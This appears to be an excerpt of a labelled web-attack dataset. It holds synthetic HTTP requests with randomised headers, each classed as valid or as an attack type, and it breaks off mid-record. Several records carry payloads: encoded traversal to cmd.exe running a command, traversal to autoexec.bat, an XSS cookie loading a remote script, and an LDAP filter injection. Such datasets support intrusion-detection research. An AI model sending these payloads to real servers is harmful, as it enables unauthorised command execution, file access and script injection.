Client-ip: 41.140.236.120
Cookie: 8n4t8hmnyptsw=\.\.\/\.\.\/etc\/0I0a.conf;ugRaoopewodsx9c=uhj
Date: Fri, 23 Jul 04 01:38:12 CET
If-Match: *
If-Range: Mon, 02 Apr 07 14:12:50 GMT
Max-Forwards: 822
Authorization: oslp 5gduie=hursly
Referer: /leoE.pdf
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 1.1; ao-E1; rv:5.5.1) Gecko/69610774
Transfer-Encoding: identity

null

End - Id: 46068
Start - Id: 13005
class: Valid
GET /rpr22Xy5O5/sm59kybC@ndFwNWdVCj6.gif?yhhi=mc1w+&stghNsrn=EmRypa&uehc=nsdte&Di6k.=+tyftyqy&8lk=%24&dC@5CBUZmail4=8aXQcMkG_&sbv=cmalu&0h01fngntozls7l=0&nr0ftoersvjse=Apao&deer4avzidhmo=464&ka=oPHUTUApBh&tn71inngya=Cc3z3 HTTP/1.1
Host: 251.8.62.74
Connection: iocoa
Accept: text/*;q=0.3, application/*;q=0.9, text/*;q=0.5
Accept-Charset: windows-874
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 3.187.95.178
Cookie: Tabpdst8gRoet=97192737;vafaE=zodenhaoOdrmt;agnic3rews=0042;-Ehhz_R=50
Cookie2: $Version="656"
Date: Sat, 08 Oct 05 15:16:05 CET
ETag: "i.gmhRWIx-8sAZm5IlqO"
Expect: Xeaushv
From: lusn@oOluioot.it
If-Modified-Since: Sat, 17 Feb 07 12:30:00 UTC
If-Unmodified-Since: Thu, 15 May 08 11:13:12 CET
If-Match: *
If-None-Match: "uw8plTMgB7wG1dqbgBU"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: ttefa m2inah=deerrsiR
Authorization: Basic c285c3Q1b2g6bW9INzBsamw=
Range: 777-8861,-671902,43-427
Referer: /eeyhssn/iesn.png
TE: trailers,trailers,chunked
Trailer: Range
User-Agent: onwaRsI/8.3
UA-CPU: StrongARM
UA-Disp: 222,458,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 011x9947
Via: FTP/1.8 www.42aw.js
Transfer-Encoding: gzip
Upgrade: c6eO/3.5, jIuI/9.7, lwmmo/6.8
Warning: 372 255.68.21.83 "wshteTepoSfeNaBeeet" "Sat, 04 Apr 09 24:07:12 UTC"
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 48761623
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13005
Start - Id: 43736
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.heooan.st:098
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-1, x-mac-japanese;q=0.7, windows-1254;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 42.85.153.5
Cookie: atoe=86497;en50tera=rtttometa+g;irleRsia=fatnfoenyatl1;irm=reM5CV4vfK;e7qilM8xs1r2s=sroi%utdmh;3us15oan8=fcetosycu2asn
Cookie2: $Version="25"
Date: Thu, 18 Aug 05 22:26:40 CET
ETag: W/"G4AsBzyc4BCrx9quAQV"
Expect: eiy7a
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Sun, 05 Jul 09 05:42:37 CET
If-Unmodified-Since: Fri, 09 Sep 05 02:51:57 GMT
If-Match: *
If-None-Match: "UQA6r-VUWdc5HKZ"
If-Range: *
Max-Forwards: 6
MIME-Version: 0.1
Pragma: t='t'
Proxy-Authorization: rguud skwsaiq=hCtyg
Authorization: NTLM YXBhaGV2ZWJ0TGJ5c25FY2hyc2p5c25hZzMwcmxIZmEwZG9ubndJYUF0
Range: -1,-82
Referer: http://rc7i.st/upshEo/sbocssr.sh
TE: gzip,chunked;q=0.9,gzip;q=0.7
Trailer: Accept-Language
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 7.6; it-eN; rv:2.2.0) Gecko/05001153
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: 3.6 44.25.229.213, unro/1.2 120.200.85.225
Transfer-Encoding: deflate
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 94311514979203
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43736
Start - Id: 27750
class: Valid
GET /H-UqandxwIatW/xumdr5YYrQ8Cb8Vb/hscriptxUM/tatysaH4lv0oetaebe/_TnczB_k7/eDxGZ7IaaDym8Kfh/cE0nGqMgD6miRSsqD/dconnectDDwhereydWy/8upxCnswEiiurf/ii/rnTuhstteqeg9.pl?8ARyw=senswt0jlcht&ate7uUhKr0m4r=fvars%3Dpdbexmlah HTTP/1.0
Host: www.tPOnh5rrtm.ch
Connection: 0odcs
Accept: audio/x-wav;q=0.2, text/xml, application/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 7.10.158.182
Cookie: 8oEehlAncohn=zr3)oMerml=l@wrz' ;siEioiedb=rclofb;n9wyCMVIsadminG=nye5.4;3zjEH3zdropy38B=nl-ebupdateys;Ettoivi=e0pUDp4fV
Cookie2: $Version="672"
Date: Tue, 09 May 06 19:18:47 CET
ETag: "qkDUvDnOW_9d17238hyB"
Expect: nsiuii=vEscmbj
From: ursy@ce4OEgimr.gov
If-Modified-Since: Tue, 16 Jun 09 17:21:40 CET
If-Unmodified-Since: Sun, 27 Jul 08 19:17:24 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Jul 04 03:53:55 GMT
Max-Forwards: 1474
MIME-Version: 2.1
Pragma: vrh=lsnameeo
Proxy-Authorization: Digest nonce
Authorization: NTLM Tzloc2hlNmFlbnQ0NGhkZXh0aXN0ZWRvb1Vzc2F6NXNodG9mbw==
Range: 2-,339-73
Referer: /seenrl/l4ehe0ys/gdhnttik/lfyu/soEW.exe
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/3.6 (compatible; sjtrsforot; WinNT; yglid84h; sCr4sk)
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 483x5740
Via: 9.4 www.ruui.css, 5.8 www.nsbahhoa.css, 0.0 8.35.218.241
Transfer-Encoding: deflate
Upgrade: xsg/9.5, Ritt/6.4, eboO/6.1, a1raeh/5.0
Warning: 677 11.109.58.216 "dsdgrmasohh" "Fri, 19 Jun 09 16:50:58 GMT"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27750
Start - Id: 45592
class: PathTransversal
GET /duu1TzUAQallOyHR/Tmcira/zggsefo/pboot.iniZR04K-HRW/rhetyl0aevniidI.cfm?waahn=st2&amc=rtlv&n8=ncvX&e2lnlaeitM=%2F%3Ae%40ewhopoh1e%3Ahe%3D&zip=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.1
Host: www.eHKaez.it
Connection: dshiel
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 133.101.53.197
Cookie: oolx=ttorMxml ;aessbisoh4n=k
Cookie2: $Version="45"
Date: Fri, 24 Feb 06 12:56:07 UTC
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: we9ro
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Mon, 25 Aug 08 12:09:23 CET
If-Unmodified-Since: Mon, 13 Mar 06 09:33:33 GMT
If-Match: *
If-None-Match: "MzcsACYnhVi0VBe"
If-Range: Wed, 26 Aug 09 16:36:37 GMT
Max-Forwards: 735
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest opaque="6glonc"
Range: -3163,-605229
Referer: /ah4ntlb/oifit.html
TE: trailers
Trailer: Accept
User-Agent: Mozilla/1.7 (Windows; U; Win 9x 8.8; sa-re; rv:6.3.2) Gecko/16538754
UA-CPU: 68000
UA-Disp: 911,8166,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5892x3688
Via: frtav/9.5 www.gmlTv.css, FTP/4.2 243.202.97.221:0663
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 125.18.205.103
X-Serial-Number: 90033234881
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45592
Start - Id: 15881
class: Valid
GET /lQYj4zWAtpIOfk8/gl7ieso0ldHs4nnunH/rVcqDNJcn/5UandSylikr/ph-nqpBFKc@OLDydzE/wdnapoancl/nOUHYDH.e/satheEl4Enbdt/oeh.tiff? HTTP/1.1
Host: 70.239.16.79
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.3, compress, compress
Accept-Language: *;q=0.6
Cache-Control: max-age=2
Client-ip: 197.55.8.188
Cookie: sUgel=408867;tp=hZ-
Cookie2: $Version="34"
Date: Tue, 09 Aug 05 01:37:45 GMT
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: tUOnsd=jes6ndZs;Iihhnrle
From: ks2tnwg@hnreg9rhrn.biz
If-Modified-Since: Wed, 26 Oct 05 09:34:52 GMT
If-Unmodified-Since: Fri, 20 Jun 08 12:51:27 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Jul 05 02:37:01 CET
Max-Forwards: 5
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM WmxpZDRlZU1kT3NlcW9jd2R0YWFsbU5vZXVjME9oc2lvOW9hd2NlaQ==
Authorization: gcrsFa egfr=wbdea3Re
Range: 141-7620
Referer: /hErAirb/tyxes6c/elwie/ud3rh.dll
TE: trailers,deflate;q=0.2
Trailer: Host
User-Agent: Mozilla/5.4 (compatible; MSIE 9.3; Linux i386; cuua9h; toesyc; cmtoEst)
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 664x941
Via: HTTP/4.2 179.94.157.232, FTP/6.4 www.higsmwth.jpg:2
Transfer-Encoding: identity
Upgrade: 5hn4s/0.4, tec/5.7, ry4ia/5.2, 6ik/3.4
Warning: 350 131.15.21.242 "Sel0th" "Sun, 27 Jul 08 18:49:35 CET"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15881
Start - Id: 2784
class: Valid
GET /aNNI.y/0nm.aspx?zroesop0tlo=aiht&P1IzscriptBGxnxtermg=thjdrop&csnoifltuj0aT=tZ__vqQ9GjK&uomB2md1a3=23&3ae=086060&n1uarneemft=a-%3D&2HYG=eem&jht=850&lziei5occeo3=86 HTTP/1.1
Host: 86.83.41.93:1
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-2
Accept-Encoding: 
Accept-Language: Itazsd-tyeilacd;q=0.1, osMoysj-m;q=0.9, avmadto-sbceamo, nnhs6-0fseelg;q=0.1
Cache-Control: ihs='iiewds'
Client-ip: 19.197.161.153
Cookie: 4R5dP@PaphpN7=eUtKbfV;kuf1tobhLrrn=708
Cookie2: $Version="78"
Date: Thu, 16 Jun 05 11:59:43 UTC
ETag: "Ddx8ftvn5TLLcJFhel"
Expect: Euusi=esnretl
From: 7nttm@aa4uGahn.st
If-Modified-Since: Tue, 25 Oct 05 08:27:40 CET
If-Unmodified-Since: Tue, 19 Sep 06 03:28:48 UTC
If-Match: "kuIFtkmqhwMjxwg2"
If-None-Match: *
If-Range: Thu, 12 Nov 09 11:13:22 GMT
Max-Forwards: 88
MIME-Version: 5.1
Pragma: O=p6tozbNa
Proxy-Authorization: Digest realm
Authorization: NTLM dGNQWGpvYWl5ZUhyZWdscHR3ZGJscnMybGlucmhkbGVvYnBocXJvYWlhYnM=
Range: 771-26
Referer: http://www.ulesopto.org/aterx9lq/tnzt.mpeg
TE: trailers
Trailer: Warning
User-Agent: sEwneEl (sifRT-.l; kCK.e2rCS; vVZsju2; mmskvXuEzG; eQxAQb)
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 944x3965
Via: HTTP/2.4 161.223.126.13, HTTP/7.5 www.Nruotstm.shtml
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 433 www.3iZiO.shtml "i0ieOtioafSs" "Thu, 10 Jun 04 22:10:06 CET"
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2784
Start - Id: 15122
class: Valid
GET /akFno@i/htnmtshetMOavVtc/cGcU@IeI_9im_/na/uLuv-h71q/lKeiOU8.jpeg?za3ahoncee=47&um96dsaduiwe8de=m%401uBku&bnseLrs1u=+ea+i%26XyL%5Cswh3&tli4idhc=cR0.YBljNW&nhnwiee=dstesberd%28bshutdownm HTTP/1.0
Host: www.ysjfihn.fr
Connection: qmisQao
Accept: application/postscript;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 65.10.135.69
Cookie: oamao9o=450;Lps0aeer=a0gsl;yauemhmtwnstzdt=$a;ZHh9=idDbehrlwre0eure;lusnml=2ordd;eu1nLs=322904
Cookie2: $Version="7"
Date: Mon, 23 Feb 09 10:54:18 CET
ETag: "lOTkK2qMWKf-Hnr"
Expect: 100-continue
From: rstu@ibae.fr
If-Modified-Since: Tue, 10 Mar 09 18:53:19 GMT
If-Unmodified-Since: Mon, 29 Mar 10 09:09:16 GMT
If-Match: "PiD5s3DOItY@Uzvd4xK"
If-None-Match: *
If-Range: Thu, 10 Jun 04 12:39:33 CET
Max-Forwards: 0830
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM OWZsYUoxOGl0dHNhcmVyaWU4cm5vaHBtcnJkc25yTm5waGVs
Authorization: Digest realm
Range: 0106-,35444-9,-1
Referer: http://www.6plvtcWg.net/9ra6/uirna/U4rugfI2.htm
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: yscns/3.9
UA-CPU: 68000
UA-Disp: 067,8316,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4274x596
Via: 3.8 www.tSnske.shtml, yuaa9/5.9 142.147.170.176
Transfer-Encoding: identity
Upgrade: qafs/3.4, ntrid/3.1, Ffue/7.1, 5uetew/4.0, pt9exy/2.3
Warning: 761 102.136.242.239 "sf0lErlspe" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 0851506973
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15122
Start - Id: 34663
class: Valid
PUT /iLwdebpa0yjetu0twong/jEhdbdouteetiD2.jpeg? HTTP/1.1
Content-Length: 13
Content-Language: wfus3f1,t4teo
Content-Encoding: compress
Content-Location: /mtnlit/aq9ciAaY/cbro.jpg
Content-MD5: b2RiZVNTZXIybmloaU9FZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Mar 09 01:56:19 CET
Last-Modified: Sun, 05 Feb 06 21:28:17 UTC
Host: www.qo3oasteg.be
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-kr;q=0.5, koi8-r, iso-8859-6, utf-7;q=0.1, us-ascii
Accept-Encoding: *;q=0.2
Accept-Language: ut-eef;q=0.9
Cache-Control: no-cache
Client-ip: 7.17.239.44
Cookie: enar=7217628;herlshvsnr=yntde
Cookie2: $Version="20"
Date: Wed, 20 Jan 10 12:30:06 CET
ETag: W/"jCZVPOgYrE4zGAxr"
Expect: 100-continue
From: ollao@ehcaufe.uk
If-Modified-Since: Wed, 17 Jan 07 13:12:18 CET
If-Unmodified-Since: Fri, 05 Nov 04 12:40:29 CET
If-Match: *
If-None-Match: *
If-Range: "0lhO0lKA7VotYzAt"
Max-Forwards: 470
MIME-Version: 8.8
Pragma: e=ohsoi
Proxy-Authorization: NTLM OUVlZWVpbXBtc3Q5bnRyeGFpdTFuaXhobmRiY2d3cnhuYVd0aGJXZWluZg==
Authorization: NTLM bjVkeGhhYWFsaWdhc0NkZXRybnRlNXVpQTJhbVRpc3RhMWpyTm5jaXRy
Range: -31378,040524-,4380-77
Referer: http://www.et3Ps.st/rfnf2ik/tddi2/ebt2/oTea7he/mnhoanta.msf
TE: trailers,gzip;q=0.9,deflate
Trailer: Connection
User-Agent: slTimpn0troaoh
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0894x8053
Via: eqy/0.4 www.feisdFas.png, FTP/0.8 www.fp0at.htm
Transfer-Encoding: identity
Upgrade: Pxo/5.2, ieHso/7.8
Warning: 119 185.151.217.148 "eeihh" "Wed, 04 Feb 09 09:01:27 GMT"
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 80315
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ue4tvzsbq=tti

End - Id: 34663
Start - Id: 33178
class: Valid
PUT /XOK7OXT/inputP.e/ydrs1Caomfod7c/SoW3Db78tt10i/sUvU./aa2OnKbFi9iArdI/abMsatpuOjguCZBl/Eooo/eosd3TcerOhap1tbahc.png? HTTP/1.0
Content-Length: 49
Content-Language: floSm,uaH2,eo
Content-Encoding: compress
Content-Location: http://www.rtsbtiF.de/attno3d/oghtttei/oAfte.pdf
Content-MD5: bm50ZGl0ZmFlZWJtZWF0bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Jul 08 05:11:13 GMT
Last-Modified: Fri, 02 Jun 06 01:59:28 GMT
Host: 217.224.3.109
Connection: close
Accept: audio/x-wav, audio/*
Accept-Charset: euc-tw, iso-2022-jp;q=0.6, windows-874;q=0.2, iso-8859-5;q=0.9, windows-1255
Accept-Encoding: *
Accept-Language: jht-ut4;q=0.4, sh-lrter
Cache-Control: no-cache
Client-ip: 137.134.144.92
Cookie: i3ttn6hoexn=Sf3e;osjilKegOhdb=reeztcEae6rR1ls;lpuh2CchnN=oZo9nls4rl5uo4:;8ph=ata;lsda=xbtiNl1
Cookie2: $Version="07"
Date: Mon, 21 Feb 05 08:41:30 CET
ETag: "s28RdzsDDkRqn0FmZ"
Expect: 100-continue
From: ntsrj@mDKe5itb.net
If-Modified-Since: Tue, 06 Dec 05 02:33:31 GMT
If-Unmodified-Since: Wed, 31 Dec 08 22:27:46 UTC
If-Match: "u7q2oWdrZPljovtQGD"
If-None-Match: *
If-Range: Sat, 09 Aug 08 16:30:37 GMT
Max-Forwards: 75
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic dnQxcjo0YWF0RXMwcg==
Authorization: mDhe Enaistst=e56ose
Range: 68833-,-57354
Referer: http://ddyris.it/otbl1/elIe/irotat.js
TE: chunked;q=0.1,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: rLMaF0A http://www.sohh7h5g.ch
UA-CPU: PowerPC
UA-Disp: 3344,7896,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 168x064
Via: 4.9 187.80.148.35
Transfer-Encoding: deflate
Upgrade: afteyP/8.9, csc/8.1, exortn/7.3, erha/8.6, aschS/4.3
Warning: 008 6.86.95.176 "mrie" 
X-Forwarded-For: 121.78.223.99
X-Serial-Number: 0421946796861302632
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Eb2e9eoPnot='roinput]xer es&oies=eyslk3decp7h

End - Id: 33178
Start - Id: 48290
class: XSS
POST /x9UfhK_RLh/qxH.C@hWD_GN-/EA.uDKr0includeH/rP3@sPb/noHrfnQ8eruoe/u1la_F/doia6hcplarnctopgro7/ae-KHVZQFOONhYDjYz/Eretetsmaeiupixihq/irgkaen.php4? HTTP/1.1
Content-Length: 129
Content-Language: rsh,arh,2whseo
Content-Encoding: gzip
Content-MD5: aEFlSHZObGJDQUN1aE5xZg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 May 06 20:11:05 GMT
Host: 186.221.9.235:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp;q=0.2, cp-950;q=0.8, euc-kr;q=0.5, iso-8859-5, utf-8
Accept-Encoding: gzip, identity, deflate;q=0.0, deflate
Accept-Language: *;q=0.8
Cache-Control: max-stale=78
Client-ip: 93.214.237.249
Cookie: qjsDsixsn=<div style   =  "  binding:  url([http://www.anndonma.com/script/tia.jsp]);">;Rh0R49eiirdauun=e e
Cookie2: $Version="84"
Date: Mon, 19 Jan 09 23:03:20 UTC
ETag: W/"S8OrHhp5DL5SDAKs"
Expect: mAel
If-Unmodified-Since: Tue, 20 Dec 05 15:42:04 GMT
If-Range: Thu, 26 Jan 06 12:10:34 CET
MIME-Version: 0.1
Authorization: Basic NXQwcnVzOmlsczZyZWgx
Referer: /ucelo/Tegd/eeRgdae/asao/eaAos.tiff
TE: deflate;q=0.5
User-Agent: Mozilla/0.8 (Windows; U; Win98 0.4; io-li; rv:7.0.1) Gecko/98084054
UA-Disp: 258,8111,16
UA-Color: color32

iidnla=m>hpne&oksasib=tse$s&t09rn2uEc1aw=93&K-JX7QMs=yA9@Vz&csdhhtrshqpd=20538234&dtepS=keue$&9JSFcTluI=iefptxzsamazheele

End - Id: 48290
Start - Id: 30182
class: Valid
GET /80Ew@1jKVacW3.mdb?noxo=zbJg3ILQQt4&uejElta=896027&eryqizdlngCo=95046&antpao=aamvsBtwhnajw&iScoertPrna=0window.openbNt&7RnihrGsNodn=3621604 HTTP/1.0
Host: 24.31.233.1
Connection: u3aanb
Accept: video/quicktime, image/*
Accept-Charset: x-mac-turkish;q=0.6, iso-2022-jp;q=0.3
Accept-Encoding: gzip;q=0.6, identity;q=0.2, compress, gzip;q=0.3
Accept-Language: hmd9scUt-r28arc;q=0.3
Cache-Control: max-stale
Client-ip: 43.245.129.81
Cookie: MEtDx6Ao=wxQUSamNo7a;VLtS_14b2V=sdc3slo2bArtwe7gg;EN0JDOtW=imnullr
Cookie2: $Version="502"
Date: Fri, 29 Apr 05 04:25:17 CET
ETag: "8cieUy-vSOpwIbKZ"
Expect: 100-continue
From: n30oip@sye2lHtos.gov
If-Modified-Since: Sun, 22 Feb 09 21:40:58 UTC
If-Unmodified-Since: Wed, 02 Sep 09 15:50:56 CET
If-Match: *
If-None-Match: "fsypXXTqtH5P6_be"
If-Range: Fri, 02 Sep 05 09:33:00 GMT
Max-Forwards: 146
MIME-Version: 5.5
Pragma: s0rb='sa1iwEsl'
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: NTLM NGZsbWlkOGxoaW5zMmhpOGpxcmFlbnRzQWVtNWVscFR0b3plbm9v
Range: -5461,-03305,-419
Referer: http://www.elTnherz.ch/zaicb/Esiean/rrqshdY0.swf
TE: trailers,chunked;q=0.8
Trailer: Connection
User-Agent: vtuemneh/3.1.5.8.1
UA-CPU: x86
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: HTTP/4.2 www.dwdeiu.gif, HTTP/8.5 www.a2ydNa.css, xeeylr/4.2 www.grygt.tiff
Transfer-Encoding: gzip
Upgrade: delna/9.9, tta/9.0
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 5387143927109477044
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30182
Start - Id: 18953
class: Valid
GET /jG9aJ9S1.eWBK572/mb9Y/kfbmensu5ecctgssodte/ur.fRRxa4Rem/qhdZ.php?CvBz.3=anph-sr+aw%2B0a0eifcbsamsd&seivajRnhvu=8833&Rj4Ogvohaving=9fImQ.L7HmkH&0o=xEGTEqssQNE4&eesandsierd=ezifyodeuspeoosbmi HTTP/1.1
Host: 255.153.8.188:59358
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, x-mac-chinesetrad, macintosh, windows-1252;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=2
Client-ip: 248.148.61.44
Cookie: ye=3198;uif1bsa6aoeaunh=vnDz1AG2Z8
Cookie2: $Version="0"
Date: Mon, 02 Oct 06 04:34:40 GMT
ETag: "Kn@@1SqtHrS32xnqNA"
Expect: 9S9zts
From: yhhrcnd@rmltnrr.ch
If-Modified-Since: Wed, 15 Feb 06 01:17:25 CET
If-Unmodified-Since: Mon, 08 Dec 08 08:31:29 GMT
If-Match: *
If-None-Match: "HTILIVRR@PMPGY2"
If-Range: "rOXZXcBX4AFe73KCY"
Max-Forwards: 8574
MIME-Version: 9.9
Pragma: n2tsoO=b
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM eXRzdHJpdGNnM255ZW5rc24ycERpYXQ1T2NhM0hvZHZmcnM=
Range: -6189,7368-,242940-
Referer: http://gnhtye6.biz/fmh3is/do8drh/a1drw/eahgdne/emyiipo.pdf
TE: chunked,deflate;q=0.0,trailers
Trailer: Authorization
User-Agent: doaaSzh8saEuw9Oirq5y
UA-CPU: 68000
UA-Disp: 2836,0618,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2163x0680
Via: 9.9 152.45.137.146
Transfer-Encoding: dosr; l2t9ex=tttkttkb
Upgrade: galn/0.4, ss2C/2.0, o7ocRs/3.2
Warning: 274 103.50.6.94 "Nnxruknc1" "Wed, 14 Dec 05 19:16:26 UTC"
X-Forwarded-For: 31.248.238.253
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18953
Start - Id: 4946
class: Valid
PUT /bin77@evallGX0/ieEl/iCDH8TPvESnlqu/nhhC@T66Qr/g4vSpnMsmk/6iioa/sEr3zqkPSwB1h-/tTieardesndilPedre/y5y8_H66QOVdelete6/4151UJ4/yf/nwokTcdV7xDlmO.js? HTTP/1.0
Content-Length: 61
Content-Language: siO7tvga,emr1sta,ih
Content-Encoding: identity
Content-Location: http://www.3lcjg.be/9shGffhr/ndmerw/lu3OleI/pagnrrsr.jpeg
Content-MD5: aWJuc2VyY29vZm5zZXljbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Nov 06 13:24:31 GMT
Last-Modified: Mon, 22 Jun 09 02:57:02 CET
Host: 225.240.250.59
Connection: eeL1D
Accept: text/xml, video/*;q=0.8, application/rtf;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress, identity;q=0.4
Accept-Language: *
Cache-Control: gteHykd='rrateneo'
Client-ip: 103.157.186.193
Cookie: fgw8XFRexecp=\gsreplaceautoexecorconnectgaa-or=;4nsed=lhpw hhtpassn(ea(locationda6sopt;cea4=3111464
Cookie2: $Version="35"
Date: Thu, 23 Jun 05 21:28:02 CET
ETag: "ivUmhvVLJntPvA8uYFdG"
Expect: 100-continue
From: gneIsg@soeinse9uz.cz
If-Modified-Since: Sat, 28 Aug 04 21:00:56 CET
If-Unmodified-Since: Wed, 04 Jul 07 12:49:51 GMT
If-Match: *
If-None-Match: "pcECby7RE@EpuzGE"
If-Range: Mon, 25 Apr 05 13:04:06 GMT
Max-Forwards: 50
MIME-Version: 6.5
Pragma: c=i
Proxy-Authorization: NTLM bHRsem5hb2xkMHhhbmtldGdodmNhcG54OWlwZTExbnRzbzQ=
Authorization: eesn 8pteoosh=n6ct
Range: -9,-30994,21-971
Referer: /elae8ht/oernptS/6wutoaM/an9O.css
TE: chunked,gzip
Trailer: Expect
User-Agent: Mozilla/1.8 (Windows; U; WinNT 9.4; id-re; rv:6.8.2) Gecko/76719370
UA-CPU: Sparc
UA-Disp: 979,352,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7038x743
Via: FTP/8.9 www.purlR.shtml:50, hluc9/1.6 www.iompcA.css
Transfer-Encoding: f5ts; afneopet=otbn
Upgrade: fFAahd/7.2, t4Oi/2.4
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 18.33.117.239
X-Serial-Number: 79390655563106676515
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

H7Vaemtozghn=ebIXb9B&4eoejitzz5arg=5449739&sftorgrotetp=90731

End - Id: 4946
Start - Id: 37131
class: LdapInjection
GET /y7ikwst6wecc4e2ntoe/rI.II9Nv6X2/AhdO/ledtssom/psj-1_mpKhV/ZRHiynRK.gif?aidstm3dtlaMn3e=odsiRid7mfluy&zjd.=r&9Le=phpi&mDdoxdkih=00&h-OsBD=hw%29%28%26%28objectClass+%3D+++p5gs*%29&8nes=lBhopEstabeteDn HTTP/1.1
Host: 136.134.52.241:80
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, x-mac-turkish;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: StitSfsy=iSiex
Client-ip: 165.184.227.237
Cookie: 3lin5eite=h1Obta;5rcrbl=18724;h2loee2esct=592708;sh4pCZG0I=s5hhGN75
Cookie2: $Version="74"
Date: Sun, 19 Jul 09 02:17:46 GMT
ETag: W/"TzveiS5IzxQFMU_"
Expect: seeuhtcr
From: ke6iat@otEmem.org
